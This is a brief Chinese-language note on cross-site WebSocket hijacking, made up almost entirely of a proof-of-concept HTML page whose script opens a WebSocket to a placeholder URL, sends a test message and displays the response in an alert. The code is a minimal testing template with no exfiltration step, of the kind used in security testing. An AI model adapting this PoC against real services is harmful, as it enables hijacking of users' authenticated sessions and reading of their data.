websocket跨域劫持

websocket跨域劫持

poc:

<meta charset="utf-8">

<script>

function ws_attack(){//自定义函数ws_attack

//定义函数功能

//创建WebSocket并赋值给ws变量

var ws = new WebSocket("url");//如果请求的Websocket服务仅支持HTTP就写成ws://，如果请求的Websocket服务支持HTTPs就写成wss://

ws.onopen = function(evt) {

//当ws(WebSocket)处于连接状态时执行

ws.send("test websocket"); };

ws.onmessage = function(evt)

{ //当ws(WebSocket)请求有响应信息时执行

alert(evt.data)

//注意：响应的信息可以通过evt.data获取！例如：alert(evt.data);

ws.close();

　　 }; }

ws_attack();

//执行ws_attact函数

</script>